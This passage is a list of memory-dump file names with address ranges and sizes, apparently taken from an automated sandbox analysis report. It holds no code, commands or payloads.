memory/5856-512-0x0000000005620000-0x0000000005621000-memory.dmpFilesize
4KB
-
memory/5856-374-0x0000000000000000-mapping.dmp
-
memory/5880-371-0x0000000000000000-mapping.dmp
-
memory/5888-290-0x0000000000000000-mapping.dmp
-
memory/5888-295-0x0000000000770000-0x0000000000771000-memory.dmpFilesize
4KB
-
memory/5888-311-0x00000000050D0000-0x0000000005356000-memory.dmpFilesize
2.5MB
-
memory/5904-526-0x00000000038F0000-0x00000000038F1000-memory.dmpFilesize
4KB
-
memory/5904-366-0x0000000000000000-mapping.dmp
-
memory/5920-376-0x0000000000000000-mapping.dmp
-
memory/5936-470-0x0000000005A80000-0x0000000005A81000-memory.dmpFilesize
4KB
-
memory/5936-355-0x0000000000000000-mapping.dmp
-
memory/5944-381-0x0000000000000000-mapping.dmp
-
memory/5944-443-0x00000000023E0000-0x00000000024B4000-memory.dmpFilesize
848KB
-
memory/5992-516-0x0000000005760000-0x0000000005761000-memory.dmpFilesize
4KB
-
memory/5992-378-0x0000000000000000-mapping.dmp
-
memory/6040-361-0x0000000000000000-mapping.dmp
-
memory/6060-350-0x0000000004B90000-0x0000000004B91000-memory.dmpFilesize
4KB
-
memory/6060-327-0x00000000000B0000-0x00000000000B1000-memory.dmpFilesize
4KB
-
memory/6060-304-0x0000000000000000-mapping.dmp
-
memory/6116-319-0x0000000000F10000-0x0000000000F11000-memory.dmpFilesize
4KB
-
memory/6116-345-0x0000000001820000-0x0000000001822000-memory.dmpFilesize
8KB
-
memory/6116-331-0x00000000016E0000-0x00000000016E1000-memory.dmpFilesize
4KB
-
memory/6116-310-0x0000000000000000-mapping.dmp
-
memory/6216-582-0x0000000004E30000-0x0000000004EE9000-memory.dmpFilesize
740KB
-
memory/6216-583-0x0000000005350000-0x0000000005409000-memory.dmpFilesize
740KB
-
memory/6216-580-0x00000000031D0000-0x00000000031D1000-memory.dmpFilesize
4KB
-
memory/6268-539-0x000000001AC20000-0x000000001AC22000-memory.dmpFilesize
8KB
-
memory/6592-655-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/6692-598-0x00000000021A0000-0x00000000021A1000-memory.dmpFilesize
4KB
-
memory/6728-596-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/6776-581-0x0000000005610000-0x0000000005611000-memory.dmpFilesize
4KB
-
memory/6828-559-0x0000000003F80000-0x00000000040C0000-memory.dmpFilesize
1.2MB